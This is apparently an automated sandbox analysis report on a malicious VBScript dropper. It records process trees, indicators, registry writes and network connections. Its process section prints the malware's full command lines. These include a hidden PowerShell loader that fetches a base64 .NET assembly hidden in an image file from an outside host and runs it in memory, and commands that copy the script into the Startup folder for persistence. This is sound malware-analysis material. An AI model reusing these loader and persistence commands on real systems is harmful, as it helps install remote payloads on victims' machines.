download:

ofainsala.vbs

Full analysis: https://app.any.run/tasks/83ef40f0-5a2a-4c09-84f7-ccf6da8288ef
Verdict: Malicious activity
Analysis date: September 26, 2023, 10:36:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5:

DDEC06E82DCB89C40197AB830F825CFD

SHA1:

C2374C8C0C5771D5227F5FA2FF0EA0361FB1FBC4

SHA256:

2532CB332EFC6086C05D5DE55EB02CBEDBB053F10400076A521540542248986B

SSDEEP:

6144:JUxWckjbjVjYjEjzj5jajyRjMjyjIjIj5Kj5jVjDjEjhX/XcXoX1XreXajzuKR:JCWX5F5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 3488)
      • powershell.exe (PID: 1808)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1808)
      • powershell.exe (PID: 2660)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1808)
      • powershell.exe (PID: 2660)
    • Create files in the Startup directory

      • powershell.exe (PID: 2908)
  • SUSPICIOUS

    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 2456)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2456)
      • wscript.exe (PID: 3488)
    • Reads the Internet Settings

      • wscript.exe (PID: 3488)
      • powershell.exe (PID: 2660)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2708)
      • wscript.exe (PID: 3488)
      • powershell.exe (PID: 1808)
    • Application launched itself

      • cmd.exe (PID: 2456)
      • powershell.exe (PID: 1808)
    • Powershell version downgrade attack

      • powershell.exe (PID: 2908)
      • powershell.exe (PID: 1808)
      • powershell.exe (PID: 2660)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 3488)
    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 3488)
      • powershell.exe (PID: 1808)
    • Probably download files using WebClient

      • powershell.exe (PID: 1808)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 2660)
    • Unusual connection from system programs

      • powershell.exe (PID: 2660)
  • INFO

    • Checks supported languages

      • wmpnscfg.exe (PID: 3644)
    • Reads the computer name

      • wmpnscfg.exe (PID: 3644)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 3644)
    • Reads the machine GUID from the registry

      • wmpnscfg.exe (PID: 3644)
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (49.9)
.bas | Nevada BASIC tokenized source (25)
.mp3 | MP3 audio (24.9)
No data.
Total processes
43
Monitored processes
8
Malicious processes
6
Suspicious processes
0

Behavior graph

Graph nodes (flattened): start, wscript.exe (no specs), cmd.exe (no specs), ping.exe (no specs), cmd.exe (no specs), powershell.exe, powershell.exe (no specs), powershell.exe, wmpnscfg.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 1808
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '[encoded payload omitted; after the '◀▶' to 'A' substitution it is UTF-16 base64 and decodes to the PID 2660 command line below]';$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('◀▶','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2456
CMD: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\admin\AppData\Local\Temp\ofainsala.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ "WGLLKwHçRMhWJN".vbs')"
Path: C:\Windows\System32\cmd.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2660
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.oisakihsop/742.352.651.49//:ptth' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\kernel32.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 2708
CMD: cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\admin\AppData\Local\Temp\ofainsala.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ "WGLLKwHçRMhWJN".vbs')"
Path: C:\Windows\System32\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2724
CMD: ping 127.0.0.1 -n 5
Path: C:\Windows\System32\PING.EXE
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
PID: 2908
CMD: powershell -command [System.IO.File]::Copy('C:\Users\admin\AppData\Local\Temp\ofainsala.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ "WGLLKwHçRMhWJN".vbs')
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 3488
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\ofainsala.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
PID: 3644
CMD: "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Path: C:\Program Files\Windows Media Player\wmpnscfg.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ole32.dll
Total events
4 231
Read events
4 058
Write events
170
Delete events
3

Modification events

(PID) Process: (3488) wscript.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

(PID) Process: (3488) wscript.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

(PID) Process: (3488) wscript.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

(PID) Process: (3488) wscript.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0

(PID) Process: (2908) powershell.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\178\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (1808) powershell.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\178\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (2660) powershell.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\178\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (3644) wmpnscfg.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{FADC5DEC-4E71-4C75-A920-3672D2932551}\{0223239A-9990-495A-9E39-756BA32DD6F4}
Operation: delete key
Name: (default)
Value:

(PID) Process: (3644) wmpnscfg.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{FADC5DEC-4E71-4C75-A920-3672D2932551}
Operation: delete key
Name: (default)
Value:

(PID) Process: (3644) wmpnscfg.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health\{93D954FF-5F57-4C30-89CD-C2885B3965A2}
Operation: delete key
Name: (default)
Value:
Executable files
0
Suspicious files
9
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 2660
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LH3XFY89OQZY37AS0IHK.temp
Type: binary
MD5: 219900F4E3A0B4B3E1BDF364167D697E
SHA256: F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36

PID: 1808
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WGVSQAEBQ38A72RKIERY.temp
Type: binary
MD5: 219900F4E3A0B4B3E1BDF364167D697E
SHA256: F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36

PID: 2660
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9764.TMP
Type: binary
MD5: 219900F4E3A0B4B3E1BDF364167D697E
SHA256: F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36

PID: 2908
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BBSSNWGD8AZZ0YTDPON5.temp
Type: binary
MD5: 219900F4E3A0B4B3E1BDF364167D697E
SHA256: F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36

PID: 2908
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf92c1.TMP
Type: binary
MD5: 219900F4E3A0B4B3E1BDF364167D697E
SHA256: F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36

PID: 2908
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 219900F4E3A0B4B3E1BDF364167D697E
SHA256: F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36

PID: 1808
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9532.TMP
Type: binary
MD5: 219900F4E3A0B4B3E1BDF364167D697E
SHA256: F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36

PID: 1808
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 219900F4E3A0B4B3E1BDF364167D697E
SHA256: F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36

PID: 2660
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 219900F4E3A0B4B3E1BDF364167D697E
SHA256: F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36

PID: 2908
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ WGLLKwHçRMhWJN.vbs
Type: text
MD5: DDEC06E82DCB89C40197AB830F825CFD
SHA256: 2532CB332EFC6086C05D5DE55EB02CBEDBB053F10400076A521540542248986B
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
4
Threats
0

HTTP requests

No HTTP requests

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
PID: 2660
Process: powershell.exe
IP: 188.114.97.3:443
Domain: uploaddeimagens.com.br
ASN: CLOUDFLARENET
CN: NL
Reputation: unknown

PID: 4
Process: System
IP: 192.168.100.255:138
Reputation: whitelisted

PID: 4
Process: System
IP: 192.168.100.255:137
Reputation: whitelisted

PID: 2660
Process: powershell.exe
IP: 188.114.96.3:443
Domain: uploaddeimagens.com.br
ASN: CLOUDFLARENET
CN: NL
Reputation: unknown

DNS requests

Domain
IP
Reputation
uploaddeimagens.com.br
  • 188.114.97.3
  • 188.114.96.3
whitelisted
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info